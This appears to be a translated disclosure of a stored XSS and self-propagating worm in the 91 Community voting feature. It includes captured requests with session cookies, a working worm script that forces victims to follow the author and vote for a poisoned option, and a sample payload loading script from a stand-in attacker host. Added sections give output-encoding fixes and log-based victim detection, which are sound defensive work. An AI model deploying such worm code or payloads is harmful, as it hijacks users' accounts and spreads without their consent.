91 Community: stored XSS and XSS worm

Source: Internet
Author: User

Stored XSS exists in the 91 Community voting area, and it can be used to propagate an XSS worm.

Propagation:
1. Create an arbitrary vote, add options, and put the "XSS code" into one of the options.
2. Anyone who opens the voting page triggers it.

Worm implementation: the voting function in the site's own JS files is the target that carries the XSS; a voting option is modified so that it runs the XSS. Once the infected JS has been loaded it performs the following actions.

1. Automatically take part in the malicious vote, selecting the infected option (the vote is broadcast, which is what spreads it). POST implementation:

************************************ vote start ************************************
POST /vote/dovote/vid/433 HTTP/1.1                  // 433 is the voting id
Host: t.91.com
Proxy-Connection: keep-alive
Content-Length: 6
Origin: http://t.91.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1 LBBROWSER
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://t.91.com/379610694                  // 379610694 is your own id
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,UTF-8;q=0.7,*;q=0.3
Cookie: SUV=1359475045777963; _utmz=1.1359475333.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mininav=0; PHPSESSID=b2974cfa13861b6803838a46dcdec208; _TM_CN_SSO_CK=1359608730; showtip_gamecard1_10694=1; 60FC5FF9-8883-207a-B0DC-C834CE0B56A3=mjawlt1_ltc%3D; ms_nums=0; comment_nickname=91%E7%94%A8%E6%88%B7%E7%9A%84%E5%95%8A; comment_user_nickname=91%E7%94%A8%E6%88%B7%E7%9A%84%E5%95%8A; comment_user_nickname_short=91%E7%94%A8%E6%88%B7%E7%9A%84%E5%95%8A; comment_user_id=379610694; comment_user_name=594yd; u_total_score=0; u_do_score=0; u_fight=0
                                                    // (the SSO/login cookie values in the original capture are garbled and are left out here)

r=1415                                              // 1415 is the option id
************************************ vote end ************************************

2. Read the friends list and send every friend an in-site message asking them to vote (in-site message spread): fetch the list, then post the mail.

************************************ friend read ************************************
GET http://t.91.com/friend/ajaxfriendlist           // returns the friends list
// Once a friend's entry is displayed, the page goes on to fetch each friend's avatar:
GET /center/avatar.php?uid=379454311&size=small&type=real&random=1359609442
                                                    // 379454311 is the friend id
************************************ friend read ************************************

************************************ send pm ************************************
POST /pm/sendpm/379610694 HTTP/1.1                  // 379610694 is the recipient's id
Host: t.91.com
Proxy-Connection: keep-alive
Content-Length: 31
Origin: http://t.91.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://t.91.com/pm/index/newpm/uid=379610694   // 379610694 is the recipient's id
// (User-Agent, Accept-Encoding, Accept-Language, Accept-Charset and Cookie are the same as in the vote request)

subject=zhti&message=zhengwen                       // subject and body
************************************ send pm ************************************

3. Automatically follow the propagation initiator (used to count the number of infections).

GET /?controller=friend&action=follow&fid=379454312 // fid is the id of the person to be followed

My first thought was to write all of this myself. I had been learning JS for a little over a day, then spent another day trying to write the background data submission in JS, and this afternoon I realised I had been wasting my time. The reason is:



The site already provides its own functions for all of this. Find the JS file the function lives in, extract the relevant code, and analyse how the function is implemented:

************************************ doVote() ************************************
function doVote() {
    var _ = art.t91_Waiting();
    $.ajax({
        url: $GLOBALS["site_url"] + "vote/dovote/vid/" + cur_vid,
        type: "post",
        dataType: "json",
        data: $("#voteform").serialize(),
        // cur_vid is the id of the vote being cast; data is whatever option the form has selected
        success: function (A) {
            _.close();
            if (A.status == 1) {
                art.tips("succeed", A.html);            // message returned for a successful vote
                LoadPageMainHtml("commoninfo",
                    $("#copyurl").val() + ((typeof reqs_from != "undefined" && reqs_from != 0) ? ("/from/" + reqs_from) : ""),
                    true, true);
            } else {
                art.t91_TipsIcon("error", A.html);      // response message for a failed request
            }
        }
    });
}
************************************ doVote() vote ************************************

The vid of the vote is visible in the status bar, and the value of the option being cast is visible in debug mode; that is, the data value is "r=1482".

************************************ doAddFollow(_) follow ************************************
function doAddFollow(_) {
    $.ajax({
        url: site_url + "?controller=friend&action=follow",
        type: "get",
        dataType: "json",
        data: "fid=" + _,      // the variable "_" is the UID of the person to be followed
        // the returned messages for the various cases follow
        success: function (A) {
            if (A.state == 1) {
                var B = $("div[name='followconcern_" + _ + "']");
                if (B.length > 0) {
                    if (A.follow == 1) {
                        B.find("em[class='color_3']").html("\u5df2\u5173\u6ce8");          // "already following"
                        B.find("span[name='ico']").removeClass();
                        B.find("span[name='ico']").addClass("ico i_ygz");
                        B.find("span[class='col']").html("| <a href='javascript:void(0);' onclick='delfollow(" + _ + ");' class='contact_cancel'>\u53d6\u6d88</a>");   // "cancel"
                    } else if (A.follow == 2) {
                        B.find("em[class='color_3']").html("\u76f8\u4e92\u5173\u6ce8");    // "following each other"
                        B.find("span[name='ico']").removeClass();
                        B.find("span[name='ico']").addClass("ico i_hxgz");
                        B.find("span[class='col']").html("| <a href='javascript:void(0);' onclick='delfollow(" + _ + ");' class='contact_cancel'>\u53d6\u6d88</a>");
                    }
                    art.tips("succeed", A.msg);
                    delUsercard("id=" + _);
                }
            } else if (A.state == 2) {
                art.tips("warning", A.msg);
            } else if (A.state == 3) {
                art.tips("warning", A.msg);
            } else {
                art.tips("error", A.msg);
            }
        }
    });
}
************************************ doAddFollow(_) follow ************************************

Since this is a worm there must be no message prompts, so strip the official code down to just the data submission and integrate it into the JS we need:

************************************ finished worm ************************************
doAddFollow1(379454311);                 // 379454311 is your own uid
window.setTimeout("doVote1();", 1000);   // doVote1() runs with a 1 s delay; otherwise the request may be lost

function doVote1() {
    var _ = art.t91_Waiting();
    $.ajax({
        url: $GLOBALS["site_url"] + "vote/dovote/vid/453",
        type: "post",
        dataType: "json",
        data: "r=1482",                  // 453 is the vid of the vote that was created; 1482 is the option carrying the XSS code
        success: function (A) {
            _.close();
        }
    });
}

function doAddFollow1(_) {
    $.ajax({
        url: site_url + "?controller=friend&action=follow",
        type: "get",
        dataType: "json",
        data: "fid=" + _,
        success: function (A) {
            if (A.state == 1) {
                var B = $("div[name='followconcern_" + _ + "']");
                if (B.length > 0) {
                    art.tips("succeed", A.msg);
                    delUsercard("id=" + _);
                }
            }
        }
    });
}
************************************ finished worm ************************************

ps: I only just learned JS and have recently been trying to learn microcontrollers, so I did not go on to work on the second function (the in-site mail); it can be adapted from the voting JS. Sorry.

Solution: How to fix
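The report leaves the fix section empty. As an added example, not code from the original report or from the 91 Community site, the following shows the pattern that turns a vote option into a stored XSS sink and the corrected form: an option title concatenated into HTML without encoding, beside a version that HTML-encodes the title and validates the option id. The function names, the `{ id, title }` shape of an option and the attacker URL are assumptions; the report does not show the site's rendering code.

```javascript
// Added example, not from the original report. Assumed shape of a vote option
// as the page would receive it from the server: { id, title }.

// Vulnerable: the attacker-controlled option title is concatenated into HTML,
// so a title such as "<script src=...></script>" is stored once and executed
// by every browser that renders the vote page.
function renderOptionUnsafe(opt) {
  return '<label><input type="radio" name="r" value="' + opt.id + '"> ' +
         opt.title + '</label>';
}

// Minimal HTML entity encoding for text placed into element content or a
// double-quoted attribute value.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, function (c) {
    return { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c];
  });
}

// Fixed: the id must be a plain integer (it lands in an attribute value) and
// the title is encoded before it lands in element content.
function renderOptionSafe(opt) {
  if (!/^\d+$/.test(String(opt.id))) {
    throw new Error('invalid option id: ' + opt.id);
  }
  return '<label><input type="radio" name="r" value="' + opt.id + '"> ' +
         escapeHtml(opt.title) + '</label>';
}

// Constructed sample: option 1482 carrying a worm-style payload. The URL is a
// placeholder, not one from the report.
var poisonedOption = {
  id: 1482,
  title: 'Best game</label><script src="http://attacker.invalid/worm.js"></script>'
};

// Renders the same option both ways so the difference can be inspected.
function demo() {
  return {
    unsafe: renderOptionUnsafe(poisonedOption),
    safe: renderOptionSafe(poisonedOption)
  };
}
```

Two caveats a practitioner would want. First, the worm drives the site's own authenticated AJAX functions from inside the page's origin, so a CSRF token on /vote/dovote or the follow action would not have stopped it: script running in the page can read the token. The fix has to be output encoding at the point where the stored option is rendered (server-side as well, for a PHP site `htmlspecialchars($title, ENT_QUOTES, 'UTF-8')`), with a Content-Security-Policy that disallows inline script and limits `script-src` to the site's own host as defence in depth. Second, in a real browser the safest route is to build the option with `document.createElement` and `textContent` rather than string concatenation at all; the string version is shown here because it runs outside a browser.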

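For the operations side, as an added example that is not part of the original report: detection logic run over constructed access-log lines modelled on the requests the write-up captures. Every infected browser follows the worm author's uid and, one second later, posts the poisoned option, so a user who does both within a short window is very likely a victim. The log format, the `uid=` field (assumed to have been enriched from the session), and the use of 379454311 as the author's uid (the value the finished worm passes to doAddFollow1) are assumptions.

```javascript
// Added example, not from the original report. Constructed log lines in an
// assumed "<timestamp> uid=<id> <method> <path> [<body>]" format.
const SAMPLE_LOG = [
  '2013-01-31T14:05:28Z uid=379610694 GET /?controller=friend&action=follow&fid=379454311',
  '2013-01-31T14:05:29Z uid=379610694 POST /vote/dovote/vid/453 r=1482',
  '2013-01-31T14:05:40Z uid=379454312 GET /?controller=friend&action=follow&fid=379454311',
  '2013-01-31T14:05:41Z uid=379454312 POST /vote/dovote/vid/453 r=1482',
  '2013-01-31T14:06:10Z uid=100000001 POST /vote/dovote/vid/453 r=1481',   // a normal vote for another option
  '2013-01-31T14:07:00Z uid=100000002 GET /?controller=friend&action=follow&fid=379454311',
  '2013-01-31T14:20:00Z uid=100000002 POST /vote/dovote/vid/453 r=1482',   // same pair, but 13 minutes apart
];

// Parse one line into { t, uid, method, path, body } plus, where applicable,
// the followed fid or the vote id and chosen option.
function parseLine(line) {
  const m = /^(\S+) uid=(\d+) (GET|POST) (\S+)(?: (\S+))?/.exec(line);
  if (!m) return null;
  const [, ts, uid, method, path, body] = m;
  const rec = { t: Date.parse(ts), uid, method, path, body: body || '' };
  let mm;
  if ((mm = /[?&]action=follow&fid=(\d+)/.exec(path))) rec.follow = mm[1];
  if (method === 'POST' && (mm = /^\/vote\/dovote\/vid\/(\d+)$/.exec(path))) {
    rec.vid = mm[1];
    const r = /(?:^|&)r=(\d+)/.exec(rec.body);
    if (r) rec.option = r[1];
  }
  return rec;
}

// Return the uids that followed `fid` and then voted `option` on `vid` within
// `windowMs`. The worm fires the two requests 1 s apart; 5 s of slack covers
// the author's note about lost requests.
function findWormVictims(lines, { vid, option, fid, windowMs = 5000 }) {
  const byUid = new Map();
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec) continue;
    if (!byUid.has(rec.uid)) byUid.set(rec.uid, []);
    byUid.get(rec.uid).push(rec);
  }
  const victims = [];
  for (const [uid, recs] of byUid) {
    const follows = recs.filter((r) => r.follow === fid);
    const votes = recs.filter((r) => r.vid === vid && r.option === option);
    const hit = follows.some((f) => votes.some((v) => v.t >= f.t && v.t - f.t <= windowMs));
    if (hit) victims.push(uid);
  }
  return victims.sort();
}

// Sample run against the constructed log with the ids from the finished worm.
function demoVictims() {
  return findWormVictims(SAMPLE_LOG, { vid: '453', option: '1482', fid: '379454311' });
}
```

The follow-then-vote pair is the worm's fingerprint, but the poisoned option alone is a weaker signal that is still worth alerting on: a single option suddenly gathering votes from accounts that have never voted before, all with the same Referer, looks nothing like organic voting. Once confirmed, the stored option text itself is the indicator to pull from the database, and the author's uid identifies who planted it.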